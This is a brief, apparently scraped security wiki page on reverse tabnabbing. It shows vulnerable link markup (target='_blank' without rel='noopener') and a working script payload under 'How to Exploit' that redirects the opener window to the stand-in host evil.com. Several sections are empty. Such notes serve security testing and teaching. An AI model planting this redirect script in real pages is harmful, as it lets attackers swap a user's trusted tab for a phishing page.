Tabnabbing
Introduction
How to find
<a href="..." target="_blank" rel="" />
<a href="..." target="_blank" />How to Exploit
<html> <script> if (window.opener) window.opener.parent.location.replace('http://evil.com'); if (window.parent != window) window.parent.location.replace('http://evil.com'); </script> </html>
References
Last updated